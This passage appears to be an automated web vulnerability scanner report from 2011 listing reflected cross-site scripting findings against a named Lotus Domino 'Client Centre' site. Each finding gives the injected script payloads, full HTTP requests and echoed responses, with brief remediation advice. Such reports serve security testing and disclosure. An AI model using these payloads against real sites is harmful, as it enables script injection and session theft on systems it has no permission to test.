Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/framework.nsf/$icon

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f27c'%3ba92bf23027c was submitted in the REST URL parameter 1. This input was echoed as 4f27c';a92bf23027c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /web4f27c'%3ba92bf23027c/framework.nsf/$icon?OpenIcon HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: clientcentre.dstglobalsolutions.com

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:48:41 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19074
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
dbPath + '/switch?openagent&to=' + cServerNo + '~' + cServer
                           }
                           location = (redir)                
                       }
                   }
               }
           }
           Server_Name= "clientcentre.dstglobalsolutions.com" ;
           path_info= '/web4f27c';a92bf23027c/framework.nsf/$icon?openicon'
           HTTP_Referer = ''
           RedirectTo = ''

   </script>
...[SNIP]...

3.111. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/$icon [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/framework.nsf/$icon

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2852'%3b104f5b44c71 was submitted in the REST URL parameter 3. This input was echoed as d2852';104f5b44c71 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /web/framework.nsf/$icond2852'%3b104f5b44c71?OpenIcon HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: clientcentre.dstglobalsolutions.com

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:48:52 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19082
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
enagent&to=' + cServerNo + '~' + cServer
                           }
                           location = (redir)                
                       }
                   }
               }
           }
           Server_Name= "clientcentre.dstglobalsolutions.com" ;
           path_info= '/web/framework.nsf/$icond2852';104f5b44c71?openicon'
           HTTP_Referer = ''
           RedirectTo = ''

   </script>
...[SNIP]...

3.112. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/$icon [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/framework.nsf/$icon

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a758"><img%20src%3da%20onerror%3dalert(1)>d2898fe56cb was submitted in the REST URL parameter 3. This input was echoed as 1a758"><img src=a onerror=alert(1)>d2898fe56cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /web/framework.nsf/$icon1a758"><img%20src%3da%20onerror%3dalert(1)>d2898fe56cb?OpenIcon HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: clientcentre.dstglobalsolutions.com

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:48:51 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19222
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
<input type="hidden" id="RedirectTo" value="http://clientcentre.dstglobalsolutions.com/web/framework.nsf/$icon1a758"><img src=a onerror=alert(1)>d2898fe56cb?OpenIcon" name="RedirectTo" />
...[SNIP]...

3.113. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/_format/screen_05112010.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/framework.nsf/_format/screen_05112010.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload abdac'%3b7d4c96bb5a0 was submitted in the REST URL parameter 1. This input was echoed as abdac';7d4c96bb5a0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webabdac'%3b7d4c96bb5a0/framework.nsf/_format/screen_05112010.css?readform&ja= HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-3; __utma=49912755.1025025474.1317843940.1317843940.1317843940.1; __utmb=49912755.3.10.1317843940; __utmc=49912755; __utmz=49912755.1317843940.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:15 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19225
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
dbPath + '/switch?openagent&to=' + cServerNo + '~' + cServer
                           }
                           location = (redir)                
                       }
                   }
               }
           }
           Server_Name= "clientcentre.dstglobalsolutions.com" ;
           path_info= '/webabdac';7d4c96bb5a0/framework.nsf/_format/screen_05112010.css?readform&ja='
           HTTP_Referer = 'http://clientcentre.dstglobalsolutions.com/'
           RedirectTo = ''

   </script>
...[SNIP]...

3.114. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/_format/screen_05112010.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/framework.nsf/_format/screen_05112010.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69cd6"><script>alert(1)</script>060324dbfe8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web69cd6"><script>alert(1)</script>060324dbfe8/framework.nsf/_format/screen_05112010.css?readform&ja= HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-3; __utma=49912755.1025025474.1317843940.1317843940.1317843940.1; __utmb=49912755.3.10.1317843940; __utmc=49912755; __utmz=49912755.1317843940.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:14 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19325
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
<input type="hidden" id="RedirectTo" value="http://clientcentre.dstglobalsolutions.com/web69cd6"><script>alert(1)</script>060324dbfe8/framework.nsf/_format/screen_05112010.css?readform&ja=" name="RedirectTo" />
...[SNIP]...

3.115. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/_format/screen_05112010.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/framework.nsf/_format/screen_05112010.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad2c4"><script>alert(1)</script>3dcf7cba5f9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web/framework.nsf/_formatad2c4"><script>alert(1)</script>3dcf7cba5f9/screen_05112010.css?readform&ja= HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-3; __utma=49912755.1025025474.1317843940.1317843940.1317843940.1; __utmb=49912755.3.10.1317843940; __utmc=49912755; __utmz=49912755.1317843940.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:20 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19334
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
<input type="hidden" id="RedirectTo" value="http://clientcentre.dstglobalsolutions.com/web/framework.nsf/_formatad2c4"><script>alert(1)</script>3dcf7cba5f9/screen_05112010.css?readform&ja=" name="RedirectTo" />
...[SNIP]...

3.116. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/_format/screen_05112010.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/framework.nsf/_format/screen_05112010.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3133'%3bf4524c4b8d8 was submitted in the REST URL parameter 3. This input was echoed as f3133';f4524c4b8d8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /web/framework.nsf/_formatf3133'%3bf4524c4b8d8/screen_05112010.css?readform&ja= HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-3; __utma=49912755.1025025474.1317843940.1317843940.1317843940.1; __utmb=49912755.3.10.1317843940; __utmc=49912755; __utmz=49912755.1317843940.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:21 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19234
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
agent&to=' + cServerNo + '~' + cServer
                           }
                           location = (redir)                
                       }
                   }
               }
           }
           Server_Name= "clientcentre.dstglobalsolutions.com" ;
           path_info= '/web/framework.nsf/_formatf3133';f4524c4b8d8/screen_05112010.css?readform&ja='
           HTTP_Referer = 'http://clientcentre.dstglobalsolutions.com/'
           RedirectTo = ''

   </script>
...[SNIP]...

3.117. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/_format/screen_05112010.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/framework.nsf/_format/screen_05112010.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77bd5'%3b5c93d414ab4 was submitted in the REST URL parameter 4. This input was echoed as 77bd5';5c93d414ab4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /web/framework.nsf/_format/screen_05112010.css77bd5'%3b5c93d414ab4?readform&ja= HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-3; __utma=49912755.1025025474.1317843940.1317843940.1317843940.1; __utmb=49912755.3.10.1317843940; __utmc=49912755; __utmz=49912755.1317843940.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:27 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19234
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
No + '~' + cServer
                           }
                           location = (redir)                
                       }
                   }
               }
           }
           Server_Name= "clientcentre.dstglobalsolutions.com" ;
           path_info= '/web/framework.nsf/_format/screen_05112010.css77bd5';5c93d414ab4?readform&ja='
           HTTP_Referer = 'http://clientcentre.dstglobalsolutions.com/'
           RedirectTo = ''

   </script>
...[SNIP]...

3.118. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/_format/screen_05112010.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/framework.nsf/_format/screen_05112010.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 671d3"><script>alert(1)</script>6a55aef7db5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web/framework.nsf/_format/screen_05112010.css671d3"><script>alert(1)</script>6a55aef7db5?readform&ja= HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-3; __utma=49912755.1025025474.1317843940.1317843940.1317843940.1; __utmb=49912755.3.10.1317843940; __utmc=49912755; __utmz=49912755.1317843940.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:26 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19334
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
<input type="hidden" id="RedirectTo" value="http://clientcentre.dstglobalsolutions.com/web/framework.nsf/_format/screen_05112010.css671d3"><script>alert(1)</script>6a55aef7db5?readform&ja=" name="RedirectTo" />
...[SNIP]...

3.119. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/scripts_05112010.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/framework.nsf/scripts_05112010.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4e35"><script>alert(1)</script>0a608520f46 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weba4e35"><script>alert(1)</script>0a608520f46/framework.nsf/scripts_05112010.js?readform&c=1&w=1&b=1&p=1&di=1&e=1&sli=1&=1 HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-3; __utma=49912755.1025025474.1317843940.1317843940.1317843940.1; __utmb=49912755.3.10.1317843940; __utmc=49912755; __utmz=49912755.1317843940.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:55 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19413
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
<input type="hidden" id="RedirectTo" value="http://clientcentre.dstglobalsolutions.com/weba4e35"><script>alert(1)</script>0a608520f46/framework.nsf/scripts_05112010.js?readform&c=1&w=1&b=1&p=1&di=1&e=1&sli=1&=1" name="RedirectTo" />
...[SNIP]...

3.120. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/scripts_05112010.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/framework.nsf/scripts_05112010.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 827e7'%3b9e2e4f13a56 was submitted in the REST URL parameter 1. This input was echoed as 827e7';9e2e4f13a56 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /web827e7'%3b9e2e4f13a56/framework.nsf/scripts_05112010.js?readform&c=1&w=1&b=1&p=1&di=1&e=1&sli=1&=1 HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-3; __utma=49912755.1025025474.1317843940.1317843940.1317843940.1; __utmb=49912755.3.10.1317843940; __utmc=49912755; __utmz=49912755.1317843940.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:56 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19313
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
dbPath + '/switch?openagent&to=' + cServerNo + '~' + cServer
                           }
                           location = (redir)                
                       }
                   }
               }
           }
           Server_Name= "clientcentre.dstglobalsolutions.com" ;
           path_info= '/web827e7';9e2e4f13a56/framework.nsf/scripts_05112010.js?readform&c=1&w=1&b=1&p=1&di=1&e=1&sli=1&=1'
           HTTP_Referer = 'http://clientcentre.dstglobalsolutions.com/'
           RedirectTo = ''

   </script>
...[SNIP]...

3.121. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/scripts_05112010.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/framework.nsf/scripts_05112010.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e996b'%3b52081a5011f was submitted in the REST URL parameter 3. This input was echoed as e996b';52081a5011f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /web/framework.nsf/scripts_05112010.jse996b'%3b52081a5011f?readform&c=1&w=1&b=1&p=1&di=1&e=1&sli=1&=1 HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-3; __utma=49912755.1025025474.1317843940.1317843940.1317843940.1; __utmb=49912755.3.10.1317843940; __utmc=49912755; __utmz=49912755.1317843940.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:47:02 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19335
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
cServerNo + '~' + cServer
                           }
                           location = (redir)                
                       }
                   }
               }
           }
           Server_Name= "clientcentre.dstglobalsolutions.com" ;
           path_info= '/web/framework.nsf/scripts_05112010.jse996b';52081a5011f?readform&c=1&w=1&b=1&p=1&di=1&e=1&sli=1&=1'
           HTTP_Referer = 'http://clientcentre.dstglobalsolutions.com/'
           RedirectTo = ''

   </script>
...[SNIP]...

3.122. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/scripts_05112010.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/framework.nsf/scripts_05112010.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4dbad"><script>alert(1)</script>40e20d2ddfe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web/framework.nsf/scripts_05112010.js4dbad"><script>alert(1)</script>40e20d2ddfe?readform&c=1&w=1&b=1&p=1&di=1&e=1&sli=1&=1 HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-3; __utma=49912755.1025025474.1317843940.1317843940.1317843940.1; __utmb=49912755.3.10.1317843940; __utmc=49912755; __utmz=49912755.1317843940.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:47:01 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19449
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
